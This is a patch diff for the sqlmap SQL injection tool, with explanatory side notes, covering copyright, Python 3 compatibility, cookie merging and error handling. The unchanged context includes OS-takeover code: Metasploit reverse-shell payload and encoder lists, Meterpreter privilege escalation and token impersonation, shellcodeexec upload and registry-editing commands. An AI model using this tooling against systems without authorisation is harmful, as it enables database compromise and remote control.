+            candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING)
+            if "\\x" not in candidate:
+                value = candidate
+        except:
+            pass
+
     return extractExpectedValue(value, expected)
 
 def goStacked(expression, silent=False):
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -9,6 +9,8 @@ import httplib
 import urllib2
 
 from lib.core.data import conf
+from lib.core.common import getSafeExString
+from lib.core.exception import SqlmapConnectionException
 
 class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
     def __init__(self, auth_file):
@@ -19,5 +21,10 @@ class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
         return self.do_open(self.getConnection, req)
 
     def getConnection(self, host, timeout=None):
-        # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
-        return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
+        try:
+            # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
+            return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
+        except IOError as ex:
+            errMsg = "error occurred while using key "
+            errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
+            raise SqlmapConnectionException(errMsg)
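Side note on the hunk above (not part of the diff): the new try/except simply converts a missing or unreadable client key file into sqlmap's own connection exception instead of letting a raw IOError escape. A rough illustration of the pattern, with a hypothetical helper name, not sqlmap code:

    # Minimal sketch, not sqlmap code: surface key-file problems as one error type.
    def load_key_file(path):
        try:
            with open(path, "rb") as f:
                return f.read()
        except IOError as ex:
            raise RuntimeError("error occurred while using key file '%s' ('%s')" % (path, ex))
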
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -32,7 +32,7 @@ class HTTPRangeHandler(urllib2.BaseHandler):
     urllib2.install_opener(opener)
 
     # create Request and set Range header
-    req = urllib2.Request('http://www.python.org/')
+    req = urllib2.Request('https://www.python.org/')
     req.header['Range'] = 'bytes=30-50'
     f = urllib2.urlopen(req)
     """
@@ -1,11 +1,10 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import re
 import time
 import types
 import urllib2
@@ -17,6 +16,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.common import getHostHeader
+from lib.core.common import getSafeExString
 from lib.core.common import getUnicode
 from lib.core.common import logHTTPTraffic
 from lib.core.common import readInput
@@ -76,9 +76,9 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 
         try:
             content = fp.read(MAX_CONNECTION_TOTAL_SIZE)
-        except Exception, msg:
+        except Exception as ex:
             dbgMsg = "there was a problem while retrieving "
-            dbgMsg += "redirect response content (%s)" % msg
+            dbgMsg += "redirect response content ('%s')" % getSafeExString(ex)
             logger.debug(dbgMsg)
         finally:
             if content:
@@ -124,16 +124,25 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 
         req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
         if headers and HTTP_HEADER.SET_COOKIE in headers:
+            cookies = dict()
             delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER
-            _ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0]
-            if HTTP_HEADER.COOKIE not in req.headers:
-                req.headers[HTTP_HEADER.COOKIE] = _
-            else:
-                req.headers[HTTP_HEADER.COOKIE] = re.sub(r"%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
+            last = None
+
+            for part in req.headers.get(HTTP_HEADER.COOKIE, "").split(delimiter) + headers.getheaders(HTTP_HEADER.SET_COOKIE):
+                if '=' in part:
+                    part = part.strip()
+                    key, value = part.split('=', 1)
+                    cookies[key] = value
+                    last = key
+                elif last:
+                    cookies[last] += "%s%s" % (delimiter, part)
+
+            req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies)
 
         try:
             result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
-        except urllib2.HTTPError, e:
-            result = e
+        except urllib2.HTTPError as ex:
+            result = ex
 
         # Dirty hack for http://bugs.python.org/issue15701
         try:
@@ -145,7 +154,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 
         if not hasattr(result, "read"):
             def _(self, length=None):
-                return e.msg
+                return ex.msg
             result.read = types.MethodType(_, result)
 
         if not getattr(result, "url", None):
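Side note on the redirect-handler hunk above (not part of the diff): the rewritten logic keeps a dictionary of all cookie pairs (existing Cookie header plus every Set-Cookie value) instead of copying only the first Set-Cookie fragment, so duplicate names are overridden rather than appended. A simplified sketch under that reading, with hypothetical names and without the real code's continuation handling via 'last', not sqlmap code:

    # Minimal sketch, not sqlmap code: merge existing cookies with new Set-Cookie values.
    def merge_cookies(current, set_cookie_values, delimiter="; "):
        cookies = {}
        for part in current.split(delimiter) + list(set_cookie_values):
            part = part.strip()
            if '=' in part:
                key, value = part.split('=', 1)
                cookies[key] = value
        return delimiter.join("%s=%s" % (key, value) for key, value in cookies.items())

    # order preserved on Python 3.7+: "a=1; b=3; c=4"
    print(merge_cookies("a=1; b=2", ["b=3", "c=4"]))
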
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -19,4 +19,3 @@ def getPageTemplate(payload, place):
     retVal = kb.pageTemplates[(payload, place)]
 
     return retVal
-
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,10 +1,12 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import sys
 
 from extra.safe2bin.safe2bin import safechardecode
@@ -27,7 +29,6 @@ from lib.takeover.udf import UDF
 from lib.takeover.web import Web
 from lib.takeover.xp_cmdshell import XP_cmdshell
 
-
 class Abstraction(Web, UDF, XP_cmdshell):
     """
     This class defines an abstraction layer for OS takeover functionalities
@@ -130,11 +131,11 @@ class Abstraction(Web, UDF, XP_cmdshell):
                 command = raw_input("os-shell> ")
                 command = getUnicode(command, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
-                print
+                print()
                 errMsg = "user aborted"
                 logger.error(errMsg)
             except EOFError:
-                print
+                print()
                 errMsg = "exit"
                 logger.error(errMsg)
                 break
@@ -172,9 +173,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
             inject.goStacked(expression)
 
         # TODO: add support for PostgreSQL
-        #elif Backend.isDbms(DBMS.PGSQL):
+        # elif Backend.isDbms(DBMS.PGSQL):
         #    expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
         #    inject.goStacked(expression)
 
     def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
         self._initRunAs()
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,10 +1,12 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import os
 import re
 import select
@@ -20,7 +22,6 @@ from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
 from lib.core.common import pollProcess
@@ -39,7 +40,6 @@ from lib.core.exception import SqlmapGenericException
 from lib.core.settings import IS_WIN
 from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
 from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
-from lib.core.settings import UNICODE_ENCODING
 from lib.core.subprocessng import blockingReadFromFD
 from lib.core.subprocessng import blockingWriteToFD
 from lib.core.subprocessng import Popen as execute
@@ -81,6 +81,7 @@ class Metasploit:
             _ = normalizePath(os.path.join(_, ".."))
             if _ == old:
                 break
+
         self._msfCli = "%s & ruby %s" % (_, self._msfCli)
         self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
         self._msfEncode = "ruby %s" % self._msfEncode
@@ -88,60 +89,60 @@ class Metasploit:
         self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
 
         self._msfPayloadsList = {
             "windows": {
                 1: ("Meterpreter (default)", "windows/meterpreter"),
                 2: ("Shell", "windows/shell"),
                 3: ("VNC", "windows/vncinject"),
             },
             "linux": {
                 1: ("Shell (default)", "linux/x86/shell"),
                 2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
             }
         }
 
         self._msfConnectionsList = {
             "windows": {
                 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
                 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
                 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
                 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
                 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
             },
             "linux": {
                 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
                 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
             }
         }
 
         self._msfEncodersList = {
             "windows": {
                 1: ("No Encoder", "generic/none"),
                 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
                 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
                 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
                 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
                 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
                 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
                 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
                 9: ("Non-Alpha Encoder", "x86/nonalpha"),
                 10: ("Non-Upper Encoder", "x86/nonupper"),
                 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
                 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
                 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
             }
         }
 
         self._msfSMBPortsList = {
             "windows": {
                 1: ("139/TCP", "139"),
                 2: ("445/TCP (default)", "445"),
             }
         }
 
         self._portData = {
             "bind": "remote port number",
             "reverse": "local port number",
         }
 
     def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
         if Backend.isOs(OS.WINDOWS):
@@ -167,19 +168,8 @@ class Metasploit:
 
         choice = readInput(message, default="%d" % default)
 
-        if not choice:
-            if lst:
-                choice = getUnicode(default, UNICODE_ENCODING)
-            else:
-                return default
-
-        elif not choice.isdigit():
-            logger.warn("invalid value, only digits are allowed")
-            return self._skeletonSelection(msg, lst, maxValue, default)
-
-        elif int(choice) > maxValue or int(choice) < 1:
-            logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
-            return self._skeletonSelection(msg, lst, maxValue, default)
+        if not choice or not choice.isdigit() or int(choice) > maxValue or int(choice) < 1:
+            choice = default
 
         choice = int(choice)
 
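Side note on the hunk above (not part of the diff): the rewritten selection check folds every invalid answer (empty, non-numeric, out of range) into a single fallback to the default instead of warning and recursing. A condensed illustration with hypothetical names, not sqlmap code:

    # Minimal sketch, not sqlmap code: single-pass validation with a default fallback.
    def pick(choice, max_value, default=1):
        if not choice or not choice.isdigit() or int(choice) > max_value or int(choice) < 1:
            choice = default
        return int(choice)

    print(pick("", 5), pick("abc", 5), pick("9", 5), pick("3", 5))  # 1 1 1 3
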
@@ -484,15 +474,18 @@ class Metasploit:
 
         send_all(proc, "use espia\n")
         send_all(proc, "use incognito\n")
-        # This extension is loaded by default since Metasploit > 3.7
-        #send_all(proc, "use priv\n")
-        # This extension freezes the connection on 64-bit systems
-        #send_all(proc, "use sniffer\n")
+
+        # This extension is loaded by default since Metasploit > 3.7:
+        # send_all(proc, "use priv\n")
+
+        # This extension freezes the connection on 64-bit systems:
+        # send_all(proc, "use sniffer\n")
+
         send_all(proc, "sysinfo\n")
         send_all(proc, "getuid\n")
 
         if conf.privEsc:
-            print
+            print()
 
             infoMsg = "trying to escalate privileges using Meterpreter "
             infoMsg += "'getsystem' command which tries different "
@@ -501,7 +494,7 @@ class Metasploit:
 
             send_all(proc, "getsystem\n")
 
-            infoMsg = "displaying the list of Access Tokens availables. "
+            infoMsg = "displaying the list of available Access Tokens. "
             infoMsg += "Choose which user you want to impersonate by "
             infoMsg += "using incognito's command 'impersonate_token' if "
             infoMsg += "'getsystem' does not success to elevate privileges"
@@ -628,7 +621,7 @@ class Metasploit:
             payloadSize = int(match.group(2))
 
             if extra == "BufferRegister=EAX":
-                payloadSize = payloadSize / 2
+                payloadSize = payloadSize // 2
 
             debugMsg = "the shellcode size is %d bytes" % payloadSize
             logger.debug(debugMsg)
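Side note on the hunk above (not part of the diff): switching from "/" to "//" keeps the shellcode size an integer once the module runs under Python 3 (or with true division enabled), where "/" always yields a float. Illustration only:

    # Illustration only: true division vs. floor division for a byte count.
    payload_size = 9
    print(payload_size / 2)   # Python 3: 4.5 (float)
    print(payload_size // 2)  # 4 (integer, as a size in bytes should be)
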
@@ -671,13 +664,10 @@ class Metasploit:
         written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
 
         if written is not True:
-            errMsg = "there has been a problem uploading shellcodeexec, it "
+            errMsg = "there has been a problem uploading shellcodeexec. It "
             errMsg += "looks like the binary file has not been written "
             errMsg += "on the database underlying file system or an AV has "
-            errMsg += "flagged it as malicious and removed it. In such a case "
-            errMsg += "it is recommended to recompile shellcodeexec with "
-            errMsg += "slight modification to the source code or pack it "
-            errMsg += "with an obfuscator software"
+            errMsg += "flagged it as malicious and removed it"
             logger.error(errMsg)
 
             return False
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -33,19 +33,19 @@ class Registry:
         readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
 
         self._batRead = (
             "@ECHO OFF\r\n",
             readParse,
         )
 
         self._batAdd = (
             "@ECHO OFF\r\n",
             "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
         )
 
         self._batDel = (
             "@ECHO OFF\r\n",
             "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
         )
 
     def _createLocalBatchFile(self):
         self._batPathFp = open(self._batPathLocal, "w")
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -108,7 +108,7 @@ class UDF:
         return output
 
     def udfCheckNeeded(self):
-        if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
+        if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
             self.sysUdfs.pop("sys_fileread")
 
         if not conf.osPwn: